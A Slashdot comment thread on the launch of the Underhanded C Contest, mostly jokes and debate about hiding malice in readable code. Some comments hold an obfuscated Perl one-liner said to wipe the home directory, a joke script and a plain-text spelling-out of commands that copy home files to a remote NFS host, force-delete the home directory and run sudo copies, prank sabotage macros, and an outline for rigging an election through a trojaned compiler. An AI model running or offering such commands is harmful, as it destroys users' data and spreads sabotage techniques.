The First Annual Underhanded C Contest

Xcott Craver writes "We have just announced a new annual contest, the Underhanded C Contest, to write clear, readable, innocent-looking C code that implements malicious behavior. The object is to hide evil functionality that survives visual inspection of the source. The prize is beer."

Comment removed

[account_deleted]

Comment removed based on user account deletion

This will work

[The+Original+Yama]

People will do anything for beer! Who needs speech when you're gulping down a cold lager?

Re:This will work

[isny]

Based on past experience, free beer is usually the first step toward free speech.

Re:This will work

[AnusesCheeses]

You mean like Hitler's infamous Beer Hall Putsch?

Re:This will work

[The+Original+Yama]

Mod this man down for invoking Godwin's Law, but mod him up for incorporating it into a joke :)

Re:This will work

1. "Invoking" the law is what you do in response to a violation.

2. You don't mod people down over Godwin's Law. You declare the argument over, and the person who tried to use nazis or Hitler to vilify their opponent is the loser. There is not "-1, Godwin" mod category, nor should there be.

3. You only mod jokes up as "Funny" or "Insightful" if they are, in fact, funny or insightful. Saying Free Beer doesn't lead to greater liberties because Hitler once gave some people free beer fails to either debunk the original point (which can still be true in other cases), and also fails to make anybody laugh.

So no mod points should be used on his post, so people can save them to mod down both your post and mine as "Offtopic."

Re:This will work

-1, Pedantic

Re:This will work

[EvanED]

You don't mod people down over Godwin's Law. You declare the argument over, and the person who tried to use nazis or Hitler to vilify their opponent is the loser. There is not "-1, Godwin" mod category, nor should there be.

Maybe there should be a (0, Godwin) moderation.

Re:This will work

If I write a program that can make me pass for age 21 or over, do I get to keep the beer?

Re:This will work

Hmm... maybe you're onto something. TIpping tea is the first step in starting a new free world.

Re:This will work

[mizhi]

And the 20th free beer is getting close to the right to remain silent.

Re:This will work

No, but there definately needs to be a (-1, Formossa's Law) moderation.

Re:This will work

[hostyle]

Moderation nazi!

Re:This will work

[jonadab]

I think the other poster meant free speech as in loosened tongues, not political expression.

Seems a bit like those hacking contests

[bcmm]

If they can do something really malicious with innocent-looking C code, they might want to gain a bit more than beer in the course of revealing how they did it...

Re:Seems a bit like those hacking contests

[numbski]

This is worse than the people that go around obfuscated perl. At least then you KNOW they're trying to hide something. I mean, you remember this?

perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{~" -;;s;;$_;see'

Don't run that. :P Unless you really don't like your home directory. I remember someone tore it down and dissected it, but the point is that if you can "hide it in broad daylight, then it is far more dangerous. :)

I mean I could do something like this:

# When do you want it done?
$today="sudo";
$yesterday="su -c";

# Define our globals
$superman="ls";
$wonderwoman="rm"
$batm an="cp";
$aquaman="mv";

#define some important flags
$blows="-r";
$maims="-p";
$chunks="-f";
$defeats="-s";

#define some targets
$your_mom="/";
$your_dad="/usr";
$your_ sister="~";
$your_teacher="/bin";
$hell="/dev/nu ll";
$heaven="/dev/random";
$skyhigh="nfs://myse rver/myhome";

#....later, back at Superfriends Headquarters

`$batman $blows $your_sister $skyhigh`;
`$wonderwoman $blows $chunks $on $your_sister`;
`$today $batman $and $your_mom $think $heaven $is $a $great $place $for $your_sister`;
#Would you like to see the rest of the story?
#print "Would you like to hear more? Please type your password to continue!";

The superfriends save the day again.

Re:Seems a bit like those hacking contests

[surprise_audit]

Might want to reveal it from the safety of another country, preferably one that doesn't allow extradition to the US...

Re:Seems a bit like those hacking contests

[Frank+T.+Lofaro+Jr.]

I ran it from a test account I created to contain the damage.

It tried to remove the home directory itself!

Couldn't do it and it gave up without damaging any files.

Only severely misconfigured UNIX systems allow deleting one's own home directory, because the directory above your home, which is what you need permission on, you don't have write (you don't have /home writable, right)?

Nice as a proof of concept, but won't work anymore.

Re:Seems a bit like those hacking contests

[numbski]

Yeah, I didn't test it. I was just tossing code down. I could have it wipe the contents but not the directory itself just as easily. :)

Re:Seems a bit like those hacking contests

[grolschie]

I really like your story and am waiting for the sequel, or perhaps the movie/DVD.

Re:Seems a bit like those hacking contests

[Aeiri]

Here are the commands in plain text. All you have to do is copy and paste it to a new text file, add echo to the beginning of each line and BE SURE TO REMOVE THE "`"S!

I also had to remove the "$"s... not sure what shell you are using but that doesn't work on Bash or ZSH...

cp -r ~ nfs://myserver/myhome
rm -r -f ~
sudo cp / /dev/random ~

Basically it copies your home directory to your shared stuff, then removes your home directory and copies all of /, mixed with as much random data it can spit out before you Ctrl+C it, to your home directory.

Re:Seems a bit like those hacking contests

[NnT042]

It wasn't a shell, it was Perl code, which lets you execute shell commands by `enclosing said command in backticks`. You don't need to know what command you're running ahead of time because of the `$nifty way $it interpolates your $variables` (or should that be my $variables ?)
Not that I'm an expert in shells or anything, but last I looked, echo means "print this to stdout", which would do no executing and merely expose your evil scheme for the world to see. Where's the fun in that?

Re:Seems a bit like those hacking contests

[Runagate+Rampant]

another country, preferably one that doesn't allow extradition to the US...

What country is that? Is it one that wants to look like Afghanistan or Iraq?

Re:Seems a bit like those hacking contests

[Aeiri]

last I looked, echo means "print this to stdout", which would do no executing and merely expose your evil scheme for the world to see.

That was my point, exposing your evil scheme. I was talking to the other guy, who, in order to try and figure out what your commands were, ACTUALLY RAN THE CODE...

He never really found out what it did that way, and I was just trying to show him what it does.

PS: PERL, DUH, *smacks self in head*

When I see some file starting out with nothing that looks like that, I assume Bash, for some reason. If it were Perl, I would expect a sha-bang explaining that...

Re:Seems a bit like those hacking contests

[Peristarkawan]

Just FYI, both bash and tcsh do the same thing with backticks. There's no reason this couldn't be a shell script with only slightly modified syntax.

Re:Seems a bit like those hacking contests

[MCraigW]

France.

Re:Seems a bit like those hacking contests

[cosminn]

perl -e '$??s:;s:s;;$?::s;;=]=>%-{

that is in the top 3 ugliest pieces of code I have ever seem :)

Do you mind breaking it into pieces and explaining what's happening in there? I'd really like to understand it.

Thanks,

-Cos

in other words...

[beta-guy]

kill the brain cells that made innocent looking malicous code :P

Re:in other words...

[grammar+fascist]

On a more serious note - they should rethink their prize. Not everyone drinks beer, and there are plenty of talented programmers who avoid it completely. In fact, the ones who do probably have more working brain cells to throw at the problem.

Yes, I know that must come as a shock, and most people here probably won't believe me...yet it's true.

(And just to head off the inevitable nutcase looking for a Score:5, Funny: no, replacing the prize with free pr0n isn't going to cut it. :p)

Re:in other words...

[crisco]

Ah, but any other self respecting, non beer drinking programmer will recognize its value as currency among lesser mortals. Even simply passing the prize along to lesser mortals can induce acts of goodwill.

Re:in other words...

[wiml]

Hey, some studies have shown that moderate (like, 1 drink a day) beer intake helps you grow new brain cells. Kinda like those other studies that show that moderate red wine drinking is good for your heart.

(Still waiting for a study that shows that pr0n boosts immune function or something though.)

There you programmers go again...

[bennomatic]

...testing the limits of the first ammendment. And all for a beer!

Seriously, though, this is (obviously) a lot like the obfuscated c contest, but it's a cool idea, in that there's an important lesson to learn about evaluating code.

Re:There you programmers go again...

from the article:

"Inspired by Daniel Horn's Obfuscated V contest in the fall of 2004"

hmmmm...

Re:There you programmers go again...

[Hex4def6]

"...testing the limits of the first ammendment. And all for a beer! "

Are you seriously suggesting that this is stretching someone's first ammendment rights?

This is not attacking / defaming / publishing state secrets etc. This is basically the equiviliant of a riddle. If a technical (I assume) person thinks this is risky ground, I shudder to think what the average bob thinks...

Re:There you programmers go again...

[Three+Headed+Man]

char V;
V = C;

They didn't want to code it as a character literal, in case they upgrade the language later.

Re:There you programmers go again...

[bennomatic]

No, not seriously. I was just reading an article on the Patriot Act, though, and was thinking about how the masses--the same ones who are willing to accept that using BitTorrent is equivalent to terrorism--might see this sort of endeavor.

Re:There you programmers go again...

> ...Are you seriously suggesting that this is stretching someone's first ammendment rights?

--

Yep.Most other people have amendment rights,
this one has stretched an extra character.

What are the legal ramifications of this?

[CyricZ]

This sounds a lot like possible entrapment. The authorities start a contest such as this, an unsuspecting programmer submits a malicious program, and he or she is arrested and charged with a variety of computer crimes. Frankly, I won't participate in this contest considering the current legal state of America.

Re:What are the legal ramifications of this?

Pussy.

Re:What are the legal ramifications of this?

[spellraiser]

RTFA, please.

The challenge for the first UCC is to write a simple program that performs some basic image-processing operation, for example smoothing or resampling, but manages to conceal a unique imperceptible fingerprint in each image it opens.

The fingerprint should be different for every execution of the program. It doesn't have to have any particular meaning, but useful tracking information is worth extra points (tho getting caught is worth fewer points.) The print should be extractable from the output image by another program. Realistically, the detector will not have access to the original image for comparison purposes.

I seriously doubt that anyone could get arrested for writing something like this, dubious legal state or not.

Re:What are the legal ramifications of this?

[Neoprofin]

However the winning entry will be taken by the governemnt and inserted secretly by a crack team of hackers into every image editing program on the market. 1984 is here!

Re:What are the legal ramifications of this?

[Cryptacool]

What?

Are you serious? Entrapment is an undercover cop asking you if you want to buy drugs, then when you say no, he tries to persuade you and suceeds, possibly becuase you just want him to go away.

It's really not that easy for something to qualify as entrapment, also consider that writing malicious code isnt illegal, it's free speech and no different then writing a book that urges people to do something malicious, not at all illegal.

But no please, keep thinking everything is illegal and dont bother doing anything it makes it easier to actually make it illegal.

Re:What are the legal ramifications of this?

[anthony_dipierro]

The authorities start a contest such as this, an unsuspecting programmer submits a malicious program, and he or she is arrested and charged with a variety of computer crimes.

What computer crimes would be broken?

Frankly, I won't participate in this contest considering the current legal state of America.

No, you won't participate because of yor current state of paranoia over the legal state of America.

Re:What are the legal ramifications of this?

[bighoov]

Can you even breathe in that tinfoil cocoon?

Re:What are the legal ramifications of this?

[Ectospheno]

Why was the parent post marked troll? I'd say this is a clear case of moderator abuse.

Re:What are the legal ramifications of this?

I think it's more likely you won't participate in the contest because you don't have the coding skills. That and the fact that generally to take part in a competetion you would have to read the rules, which you obviously didn't take the 2 seconds to do as other replys to your troll already pointed out.

Re:What are the legal ramifications of this?

[drxenos]

Actually, his asking is enough grounds for entrapment. The person the cop is talking to must be the one to bring up the subject of buying drugs or else in the US it is considered entrapment.

Re:What are the legal ramifications of this?

[drxenos]

Get yourself a legal dictionary and look up "entrapment."

Re:What are the legal ramifications of this?

If that were the case, then I should be arrested for every programming project I did in my college c programming classes.

It did good stuff, it did a lot of bad stuff too.

Re:What are the legal ramifications of this?

[Genrou]

Not the same paranoia of the previous post, but paranoia anyway. But the first thing that I thought was something like: "oh, so, this contest will show that malicious code can be inserted in open source and it will be very difficult to spot?" -- there are at least one software company that will like to point to it. Then again, I might actually be paranoid.

Re:What are the legal ramifications of this?

No... the weight of my body tears it open when I pass out

Re:What are the legal ramifications of this?

[patio11]

What he said. You're familiar with the term "entrapment", right? You can't be prosecuted for behavior the government solicits from you -- thats why they walk on eggshells in drug/prostitution cases.

Beer

[tehshen]

I'm interested to know how the beer will be transported. In an airtight container smuggled through check-in? Frozen (planes get pretty cold you know)? Or will they just send money for us to buy beer with?

Re:Beer

The outside of planes do become quite cold, however the cabin and luggage compartments are insulated and kept at a reasonable temperature.

Re:Beer

[Ki+Master+George]

RTFA - They're sending some of their local beer.

Re:Beer

Maybe they'd ship it on the ground like most beer, dumb ass. You think they need some James Bond shit to send beer around? Smuggled? What, are you from Iran???

Re:Beer

Oh, God! Not Corona!

Re:Beer

[spauldo]

They used to use the back section of planes to make ice cream (the cold and vibration from the propeller planes was perfect for it). It was air force tradition for quite some time.

It really just depends on what kind of plane you're talking about. I'm sure there's areas on even modern large-body jets where there's an uninsulated section large enough for a keg.

Re:Beer

[MCraigW]

No, Coors Lite.

Do these count?

Do poorly written C projects with innocuous looking, yet malicious code count?

Re:The prize is beer...

Is it free as in beer?

Beer? Phui!

[devross]

The object is to hide evil functionality that survives visual inspection of the source.

The prize is world domination!

It's a bad idea

Count on the likes of Sun, Microsoft, and anyone else selling a non-C language to pounce on this as a marketing opportunity.

C is a superb language. Why besmirch its reputation with a contest to make it seem as untrustworthy as possible?

Re:It's a bad idea

[Catamaran]

C gives you just enough rope to hang yourself.

Java gives you a polished floor on which you can slip and break your neck.

C++ gives you a thermo-nuclear device.

Re:It's a bad idea

I decided that +1 Fucking Ignorant was more likely

Hey, moderation should apply to the comment being moderated, not to the moderator!

Re:It's a bad idea

C is a superb language.

Nice troll.

Re:It's a bad idea

[Tim+C]

Reminds me of a quote I read once (it's almost certainly a fortune):

In C it's easy to shoot yourself in the foot. C++ makes it harder, but when you do, you take your whole foot off

Or somesuch.

Re:It's a bad idea

[xYoni69x]

Yes, Bjarne Stroustrup (the "father" of C++) really did say that.
Google finds many other derived jokes.

Re:It's a bad idea

[Acid-Duck]

You don't get it, the whole point is to see how creative people can be.

Erik

Re:It's a bad idea

No I did get it. Simply I was pointing out the unwisdom of such a move given the opportunistic nature of some of the better-funded marketing departments out there.

Re:It's a bad idea

[dcam]

You accidently create a dozen instances of yourself and shoot them all in the foot. Providing emergency medical assistance is impossible since you can't tell which are bitwise copies and which are just pointing at others and saying "That's me, over there."

Source

Re:It's a bad idea

Despite you're moderation down by some C fanboy, I would like to chip in and agree - when I didn't have many other languages under my belt, I thought C was superb too.

Re:It's a bad idea

[Billy+Donahue]

yo-toh! yo-toh!

Re:It's a bad idea

...and Assembly gives you the keys to the Death Star.

Re:It's a bad idea

[hitman200ca]

C++ gives you a thermo-nuclear device.

With a big red button labelled "Fun!" and no instructions.

Re:It's a bad idea

[jonadab]

> C gives you just enough rope to hang yourself.
> Java gives you a polished floor on which you can slip and break your neck.

I can go along with these.

> C++ gives you a thermo-nuclear device.

I think it's more like razorwire -- even better for hanging yourself than C's plain old rope, since you can easily lacerate your hands in the process.

Of course, my language of choice has frequently been called a Swiss Army chainsaw, and it doesn't require a lot of imagination to think of ways to hurt yourself with that. I think Perl6 is supposed to be more like a multiblade Swiss Army butterfly-action light sabre, or something. (The ability to dork significantly with the language's grammar seems particularly powerful, i.e., particularly dangerous...)

Re:It's a bad idea

[leuk_he]

Java gives you a polished floor on which you can slip and break your neck.

No problem there. You just let the garbage collector sort it out.

If crashing is "malicious behavior"

[frenchgates]

doesn't that make basically all c code underhanded?

Re:If crashing is "malicious behavior"

No. Dumbass.

Re:If crashing is "malicious behavior"

[geoffspear]

Maybe all C code you write. Some people can actually design their code properly.

Re:If crashing is "malicious behavior"

[gstoddart]

doesn't that make basically all c code underhanded?

Hmmm .... you realize C forms the basis for a great deal of modern operating systems don't you?

There are more lines of non-crashing, non-malicious, well-designed, and well-tested lines of C out there than most other programming languages.

Re:If crashing is "malicious behavior"

[proverbialcow]

doesn't that make basically all c code underhanded?

Nope. Only the code that includes

#include <windows.h>

*ducks*

How will the judges be able to trust this code?

[bcmm]

If the contestants can really hide malicious code, then will the judges get code that does something innocent, something concealed to win the prize, and something else to mess up the judge's files a bit?

Re:How will the judges be able to trust this code?

[thebatlab]

I'm sure they'll run these directly on their home machine with all their important documents :)

I think I might win

[numbware]

#include
main()
{
printf("Hello World");
}

Seemingly harmless, right? Wrong. It's still in devlopment, but think about it. You should have to greet the world before you destroy it. :)

Re:I think I might win

[numbware]

there should be an 'stdio.h' after the #include, obviously (thank you slashdot filtering)

Re:I think I might win

[LiquidCoooled]

It depends which file you include to map printf...

Re:I think I might win

That's okay, the program breaks other rules anyway...

Re:I think I might win

[saskboy]

I was thinking you were including some library with the bad code, and the rest was just a smokescreen.

Re:I think I might win

[Genrou]

You might win, but you should change your code to

#include
main()
{
printf("How are you gentleman. \n All your base are belong to us.");
}

This year's challenge

[ErichTheWebGuy]

Covert fingerprinting. In other words, hiding information inside an image file. hmm... Any open-source steganography programs to use as a starting point?

Re: This year's challenge

[ErichTheWebGuy]

Any open-source steganography programs

Why, yes! http://sourceforge.net/projects/steghide/

Re: This year's challenge

[l3v1]

it won't do much good since their [stegano] goal is not to hide their behaviour from visual inspection of the code... Seek further.

Re: This year's challenge

[ErichTheWebGuy]

Of course it would. After learning how the stego program works, your only remaining task is to figure out how to hide it. You no longer have to figure out how to hide the data. Seek further you need not.

Re: This year's challenge

[agraupe]

Seek further you need not.

Well, if you're Yoda, then you can just use the Force to do it.

Indeed. This could be a field day for Java and C#.

[CyricZ]

Everyone knows that it is possible to write malicious code in C. That's just because C gives you the near utmost control over your system, and does not discrminiate based on human emotions like "good", "bad", and "malicious". Perhaps a better idea would have been to try to write malicious code in a language such as Java, which tries to prevent a programmer from writing such code. That would be a real challenge.

my submission

[selderrr]

although probblably modded funny, the code below will most often just work ! { printf ("hi, this is your bank. really. Look at the logo at the top. Trust me. I'm your bank. Now enter your VISA number and any personal information you can come up with. Maybe you'll win a pony"); scanf("%s", &visanumberbuffer); // duh... buffer overrun anyone :-) }

Is it...

Free as in beer?

Strange

[macemoneta]

This sounds like someone is asking for an DRM/watermarking-type of application, that would survive open source inspection. Hmmm.

like this?

[LiquidCoooled]

#include stuff.h
void main()
{
/* nothing / */ /* to see / * here */
/* whats * / challenging / * about */
/* this */ /* there / is no */ evil /*
screensaver(); * function */ /* here
anyone that thinks there is * / needs */
/* their / * / eyes testing */ ();
}

585

Re:like this?

[alexhs]

>#include stuff.h
>void main()
>{
> /* nothing / */ /* to see / * here */
> /* whats * / challenging / * about */
> /* this */ /* there / is no */ evil /*
> screensaver(); * function */ /* here
> anyone that thinks there is * / needs */
> /* their / * / eyes testing */ ();
>}
>
>585

I'm hesitating between an harmless evil(); function and an evil whitespace function (and I ruined it copypasting).

Re:like this?

[truedfx]

Extra points if your code looks innocent under syntax coloring;

You wouldn't stand a chance :)

Re:like this?

[Dun+Malg]

Nice idea, but it doesn't look innoucuous. It looks like a trick. I think the contest is for code the equivalent of a razor blade in a nice looking apple, rather than a razor blade hidden in a pile of clearly marked rat poison.

Re:like this?

One of the rules is that you need to write it in C. I have no idea what language you're writing in but it's not C. I can count three errors without even trying. I'm confident there are more.

Re:like this?

Think about it... nobody would expect it!

Re:like this?

[Dun+Malg]

Think about it... nobody would expect it!

errr....expect it or not, anyone seeing a suspicious pile of comments like that is gonna delete it all before compiling. After all, they're just comments.

Re:like this?

[Peristarkawan]

So you put the evil function call in plain sight later on in the source, and in the entangled evil-looking comments you hide the code that disables it.

Re:Indeed. This could be a field day for Java and

[bcmm]

RTFA. The idea is to hide the malicious functions so that the source code looks innocent.

how appropriate

[circusboy]

this is the /. fortune cookie at the moment that I read this story...

If you can't learn to do it well, learn to enjoy doing it badly.

assuming you read this with a different meaning of 'badly' in mind...

easy

[larry+bagina]

#include "/dev/console"

Re:easy

on windows do this:

#include "con"

Re:easy

[ICA]

Prove it. I just built it and it runs fine.

The judges will expect that

[MarkByers]

The judges will obviously be expecting programs that try to delete files or modify them, so they will without a doubt create a separate environment to run the malicious programs in. Probably they will restore the machine to a known clean state after every run.

If they didn't do this, you can bet that someone would try to write a program which would detect competitors' programs running and disable them.

Re:Indeed. This could be a field day for Java and

[CyricZ]

And like I said, do it in Java instead. That'll make it a real challenge, since the designers of Java made an effort to make it difficult to write malicious code in the first place. The point isn't that the code will look valid, but rather that it will perform malicious duties, which is something that is a challenge in Java, but easily done in C. Making it look valid is just an additional challenge for both languages.

Attack the Compiler

[LionKimbro]

Why attack the source code when you can instead attack the compiler?

You need only attack the compiler, or the linker, or the interpreter.

Re:Attack the Compiler

[lawpoop]

But would such an attack survive a 3rd party human audit of the source code?

Re:Attack the Compiler

[derek_farn]

For all you could possibly want to know about C, and more, check out this book (8M pdf). Those who want pure, uncommentaried, standard words can find them here.

Re:Attack the Compiler

[DrSkwid]

the whole point is "yes" RTFP

Re:Attack the Compiler

Uh, you didn't read the article, did you. The paper was a 1987 paper in which Ken Thompson described an attack that survives _ALL_ source code audits because the attacked compiler (or linker or loader) itself injects the malicious code.

Note that even auditing the complier source itself doesn't help, if the compiler is itself compiled by a compromised compiler.

Re:Attack the Compiler

[yupa]

No attack the cpu microcode and update it!!!

Re:Attack the Compiler

[yppiz]

Bury the evilness in the make file. No one will find it there.

--Pat

Re:Attack the Compiler

[dvdeug]

Why attack the source code when you can instead attack the compiler?

Because I'm not going to download my compiler from a random site on the net, but I may download image processing code from a random site on the net.

Re:Attack the Compiler

[bit01]

Bury the evilness in the make file. No one will find it there.

Bury it in the configure script. There's so much magic in there, and cross platform stuff that no one person is likely to know about, you could hide an elephant.

---

Repetitive advertising is noise and compromises free speech.

Re:Attack the Compiler

[LionKimbro]

I have never met a single programmer that understood configure scripts.

Of all the programmers I know who have understood configure scripts, they have all told me: "Oh, I just took someone else's configure script, and modified it a little. But I don't understand it."

Re:Attack the Compiler

[LionKimbro]

Yes, quite right.

I guess the thing is: What we're really concerned about here, (if I may project a little,) is voting software.

In those cases, they're probably not going to say, "download the compiler from a random site on the net." In fact, it's probably going to be very hard to control the people who compile the software, and even harder to control the people who compile the compiler. At some point, somebody's going to get the compiler, and they're going to get it from some specified place.

If it's a secret place, then the vote is determined by whoever controls that secret place. If it's a public place, well- that's something to think about.

Maybe we should have a Federal list of 100 places to get the compiler from. Or a thousand places. However it is done, we want to make it more expensive to buy the vote than the vote is worth.

Re:Attack the Compiler

[lachlan76]

But...don't you use autoconf to make it?? That's what I do, and what I thought everyone else did.

That said no-one knows how it works. It's machine generated with macros, what can you expect?

Re:Attack the Compiler

[brianosaurus]

Its a big what if scenario...

If the evil() code is innocuous looking, someone could slip it in as part of a major bug-fix patch. Or maybe ease it into the code over time. Or sneak it in as part of a port to the C-64. Or maybe use some other back-door to install it on the maintainer's source repository. There's all sorts of ways they could do it, if the happy, smiling, blood-sucking code can be created in the first place.

A few versions later, it reaches the main branch. No one found it because it was hiding really well, and no one is specifically looking for it, because it looks like normal, well-structured, i'm not totally sure what its doing, but it doesn't really look too complicated, and i don't want to seem like an idiot in my first week, clean-compiling code. Then it goes on all of those 100 approved download places.

A few versions later, there have been enough major upgrades, and sufficient debugging that most installations will have been upgraded at least once. The author merely has to wait as long as needed to get to a critical mass of zombies-in-waiting. Then BOOM!

How do you find things that the most scrutinizing examiners missed, particularly when you don't know what you're looking for?

How does a software company with only a few programmers or maybe only a few tens of thousands to examine all the code while at the same time developing it on a tight schedule, double-check something that was diliberately obscured to pass the coding standards of the corporation?

Re:Attack the Compiler

[LionKimbro]

I think I can think of easier ways.

Imagine that you have a million dollars to spend buying a vote in a key state. You can afford to buy some spies, full-time programmers, all sorts of stuff, with this much money.

Now you figure out where the code is being compiled. You do this with your plants in the process. You spend all your time figuring out: Where will they get the source code from. Where will they compile it. Where do they copy from. Etc., etc.,. Learn how that process works.

Now you have a way to find out where the compiler will come from. If some "Jim" somewhere is the person who will be compiling the code, figure out what processes will likely be followed by Jim. Is he going to get his compiler off of his own personal computer? Is he going to get a compiler from his work computer? Is he going to download a compiler fresh, and compile it himself? (If so, which compiler is he going to use to compile the compiler?) This is just detective work, and there are people you can pay to do it.

Now you have the source of the compiler. You pay a sympathetic programmer to analyze the public source code, and to build a bug into the compiler.

You don't worry about submitting an official commit. Rather, you make sure that you can hack into the compiler distribution site on the day that you need to put the code in. If Jim is going to compile it himself, the job is even easier: You only need to sneak in at night, replace his gcc with your bugged gcc, and then when he compiles the compiler with his bugged gcc, it will similarly infect the newly compiled gcc. Then when he downloads the squeaky clean publicly-approved source code, it will bug the output.

Really, this is very very simple. The only major costs are, I think, 6 months to develop and test the code, and the costs involved in spying, hacking, and deployment. None of these tasks are mysterious, and the working knowledge to do it is readily available. All you need is X dollars, and you can steal an election in this way.

The publicly visible source code is a slight of hand. The entire public watches the source code. "The source code is clean, the source code is public, we won the public source code, we know it's good because the source code is clean." You'll have armies of people studying, documenting, talking about, celebrating the source code.

That's all in the right hand.

In the left hand, you've got the compiler. Nobody cares about the compiler. Nobody talks about the compiler. Nobody thinks about the compiler.

It's way too easy.

Are people motivated to steal elections? You better believe it. Do people have the money to steal elections? You better believe that, too.

Using computers to count elections is the most dangerous way to do elections. We can use computers to good effect in elections, but it's not the way we think. Here's how to put computers to good use: Constantly recording count efforts.

That is: Video tape all access (save recording ballots, and the inside of the ballot shuffler) to the ballots. The whole way through. For every single vote. And as the votes are counted, record the whole process. Make the tapes available for study on the Internet. People can monitor the counting process from home. Every single check mark, human verified, as many times as anybody likes. Anybody can be a ballot counter at home, supervising the whole thing.

We can have the most trusted ballot system ever, if we do this.

Re:Attack the Compiler

[brianosaurus]

Neither how the bug gets there, nor why are important. There may be some in place already. Who knows?

The point of the contest is to see what people come up with as ways to hide such bugs in the code. How hard is it to make a change to some code, like, say,

if (user == "NULL") { evil_laugh(); }

instead of

if (user == NULL) { evil_apology(); }

could easily slip by someone scanning the code for the zillionth time under heavy deadline pressures. And there's no way that's gonna win the contest.

So is there a way to detect these sorts of obfuscated sneak attacks before they strike?

Here you go

[titzandkunt]

Just tuck it away in a commonly used header file, use touch to restore the last date/time of modification, and you're all set.

#define void int

Hours & hours of irritation & confusion!

T&K.

Re:Here you go

[kwoff]

Nice sig, haha.

Re:Here you go

I'll see your compile-time error and raise you a runtime error:

template<class A, class B> inline bool operator != (A & left, B & right) { return left == right; }

As an added bonus, most (all?) debuggers won't let you step into inlined code, making it even harder to detect.

Re:Here you go

I concur!

Re:Here you go

[Tony+Hoyle]

Good compilers won't inline when compiled debug for this reason...

If you put things like that into a header file it really screws up Visual Studio though.. it hangs for about 5 minutes then brings up a 'which one of these 50,000 invocations of this function do you want to step into becuase I duhhh forgot' dialog.

Re:Here you go

I actually did something like that once, for reasons that had nothing to do with obsfucation.

You see, I had to write some kind of simulation program that required a huge array of numbers. I wasn't sure whether to use "long int", to avoid overflow, or "short int", to avoid wasting memory. So I thought, "OK, I'll use a typedef, and so if I pick the wrong type, I can easily change it later."

But I was afraid that, out of habit, I would accidentally use "int" instead of my typedef. So I "temporarily" added "#define int ERROR" to my code.

Unfortunately, by the time I got around to compiling "int main()", I had completely forgotten about that #define, and couldn't figure out where the compile error was coming from.

Re:Here you go

[Jerry+Coffin]

#define void int

Hours & hours of irritation & confusion!

I prefer:

#define struct union /* reduce memory usage */

IMO, this fits the original definition more closely as well -- the comment's explanation sounds almost plausible (at least to some people).

--
The universe is a figment of its own imagination.

underhanded c

[heatdeath]

int the_slaves;
free(the_slaves);

kernel backdoor

what about that attempted kernel backdoor a few years back? using two flags together would lead to local root.

Story is just plain bad

[typical]

Everyone knows that it is possible to write malicious code in C. That's just because C gives you the near utmost control over your system, and does not discrminiate based on human emotions like "good", "bad", and "malicious". Perhaps a better idea would have been to try to write malicious code in a language such as Java, which tries to prevent a programmer from writing such code. That would be a real challenge.

Yeah, I just flip the "+good +bad -malicious" flags on javac when I want to trust code. Come on, that's ridiculous.

This is not a hard task, but it's kind of stupid, on the order of "who can break into the most computers today" (I dunno, who can run nmap the longest?)

There are so many *interesting* things that could be done as a programming contest, and the submitter chose something that's a pain in the ass for other people, doesn't really challenge the brain ("shortest version of X"), and can't be used for much other than bogus arguments that "C is dangerous" or the obvious card, "Open Source is insecure" (you can look at the much larger sample set of SourceForge and the lack of Trojans implanted and later discovered).

The number of *interesting* security stories that could have challenged people and been useful is legion. "Can we have a system that is unbreakable and does X", (followed by the inevitable followup posts where people punch holes in the design) or other things. You could have asked "How can OSS projects avoid allowing malicious code being sumitted?", which would have started an interesting set of threads from people who work on proof-carrying code, would have taught readers something, and maybe provided improved security for the world at large. Instead, we're going to see a handful of bad, obfuscated C, and a bunch of halfassed arguments against C and OSS, neither of which has much connection with reality. There will be some language arguments, where someone says "we should use [LANGUAGE_WITH_BOUNDSCHECKING]", some security guy that will point out that this doesn't begin to avoid stopping malicious code, someone will make some stupid arguments about how their favorite OS is more secure than anyone else's, we'll get some rehash of NX features that have been done time and time again on Slashdot...seriously, goddammit. The day someone makes a knockoff of Slashdot that's a bit more computer-science oriented and isn't solely aimed at producing the same tired old trolling every day is the day I jump ship.

Re:Story is just plain bad

There are so many *interesting* things that could be done as a programming contest, and the submitter chose something that's a pain in the ass for other people, doesn't really challenge the brain ("shortest version of X"), and can't be used for much other than bogus arguments that "C is dangerous" or the obvious card, "Open Source is insecure" (you can look at the much larger sample set of SourceForge and the lack of Trojans implanted and later discovered).

Oh, please. You don't think that participating in this contest or seeing the results will make people better code reviewers?

Re:Story is just plain bad

[schotter]

"The day someone makes a knockoff of Slashdot that's a bit more computer-science oriented and isn't solely aimed at producing the same tired old trolling every day"

Have you seen Technocrat.net? Looks to be just starting, but I'm already impressed: slashdot ran an article on a nanotech textiles protest - technocrat ran one on a group of scientists demonstrating a refined iteration of a carbon nanotube CPU. Comments are on-topic too, touch wood.

(Or there's always ars for CS stuff, but they're hardly a /. knockoff.)

Re:Story is just plain bad

hey typical 886006,
why don't you develop your idea and announce your contest? I'll make a donation to the prize, and you'll give new life to slashdot!

Re:Indeed. This could be a field day for Java and

Wrong. Making it look valid is the entire point.

Wrong prize!

IMHO the prize is not the right one; they should give them a ham, because a ham contains salt, which seems benign but can be harmful as well. Do I look innocent enough or just plain stupid?

Oh well...

-Emili Brogor Dodepetete

Re:Wrong prize!

and beer can't be harmful, despite being benign in relatively small quantities?

Re:Wrong prize!

Well yes, but it doesn't have salt, does it?

Actually, maybe it does, but beer doesn't have that reddish color that hams have.

Well maybe there's *some* strange beer out there that's red like a ham, ok, ok, I get your point...

Re:Wrong prize!

[o'reor]

It's interesting to mention that in the Basque country (Spain/France), one of the most frequent diseases is stomach cancer, dure to eating too much cured ham (lots of salt in it).

Re:Wrong prize!

[spauldo]

Red beer - it's a mixture of beer and tomato juice (and some people do put salt in it as well).

Good luck finding it outside oklahoma though.

Diebold

[jay95]

I nominate Diebold!
Now if only we can get them to enter their code in the contest...

Re:Diebold

[ceejayoz]

Pfft.

It's supposed to survive inspection, remember. giveElectionToTheRepublican() is underhanded, but it probably won't survive inspection. ;-)

Re:Diebold

So far it has.

SxE anyone???

[TheGreatOrangePeel]

The prize is beer.

What if someone in the straight edge crowed wins?

Re:SxE anyone???

[Hatta]

The prize is beer.

What if someone in the straight edge crowed wins?

They can give the beer to me.

Re:SxE anyone???

[alfrin]

The prize is beer.

What if someone in the straight edge crowed wins?

Straight Edge is really getting to a problem, here in Reno, Nevada its been classified as a gang because the SxE beat the crap out of people who don't follow their beliefs.

But I'll take the prize if they don't want it

Re:SxE anyone???

[argent]

Then the prize is near-beer.

Re:SxE anyone???

[drsquare]

What is the straight edge crowd?

Why?

